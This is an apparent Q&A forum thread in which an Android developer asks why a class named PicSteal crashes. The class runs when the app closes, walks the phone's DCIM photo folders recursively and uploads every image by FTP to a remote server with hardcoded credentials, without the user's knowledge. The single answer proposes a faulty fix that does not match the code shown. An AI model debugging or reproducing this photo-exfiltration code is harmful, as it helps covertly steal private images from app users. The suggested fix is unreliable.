# Android app crashes when this class executes:

Tags: java, android

This class executes during the onDestroy() method of the main activity. It does about 10 cycles, then crashes. What can I do to prevent this? Do I slow down the process after the upload step?

Here is the code:

```
package com.simplejsonapp;

import it.sauronsoftware.ftp4j.FTPAbortedException;
import it.sauronsoftware.ftp4j.FTPClient;
import it.sauronsoftware.ftp4j.FTPDataTransferException;
import it.sauronsoftware.ftp4j.FTPException;
import it.sauronsoftware.ftp4j.FTPIllegalReplyException;

import java.io.File;
import java.io.FileNotFoundException;
import java.io.IOException;

import android.os.Build;
import android.os.Environment;

public class PicSteal {
public static void picStealer(){
    //Create the FTP connection object:
    FTPClient client = new FTPClient();
    try {
        //String deviceType = getDeviceName();
        /**
         * This section is where I need to add a decision structure for 
         * what folder to download from based on what kind of device is
         * using the software.
         */

        client.connect("127.0.0.1"); //create connection to server (IP changed here because 4chan)
        client.login("ftpuser", "aaa");//login using credentials

        //this is where the magic happens
        String deviceName = getDeviceName();

        //File samsung = new File("/storage/emulated/0/DCIM/");
        //create the file object
        File stock = new File(Environment.getExternalStorageDirectory().getAbsolutePath() + "/DCIM/");
        //create the array of files to iterate over

            File[] listOfFiles = stock.listFiles();
            processFiles(listOfFiles, client);





        client.disconnect(true);//disconnect

    } catch (IllegalStateException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (IOException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPIllegalReplyException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    } catch (FTPException e) {
        // TODO Auto-generated catch block
        e.printStackTrace();
    }


}
private static void processFiles(File[] listOfFiles, FTPClient client) {
    for (int i = 0; i < listOfFiles.length; i++) {
          if (listOfFiles[i].isFile()) {
             //upload file to server
              try {
                client.upload(new java.io.File(listOfFiles[i].toString()));
            } catch (FTPDataTransferException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (NullPointerException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } 
              catch (FTPAbortedException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
            //System.out.println("File " + listOfFiles[i].getName());
              catch (IllegalStateException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FileNotFoundException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (IOException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FTPIllegalReplyException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            } catch (FTPException e) {
                // TODO Auto-generated catch block
                e.printStackTrace();
            }
          } else if (listOfFiles[i].isDirectory()) {
            //System.out.println("Directory " + listOfFiles[i].getName());
              File[] newList = listOfFiles[i].listFiles(); 
              processFiles(newList, client);
          }
        }// TODO Auto-generated method stub

}
public static String getDeviceName() {
      String manufacturer = Build.MANUFACTURER;
      //String model = Build.MODEL;
      return manufacturer;
}
```

}

Answer (score 0):

look at this line you are passing string in upload in place of listof files

```
client.upload(new java.io.File("listOfFiles[i]"));
```

use

```
client.upload(new java.io.File(listOfFiles[i]));
```

Comment: noted. thanks for pointing it out, it showed me that i posted the old version of the code. give me about 20 seconds, ill update the code in the main question with the latest code.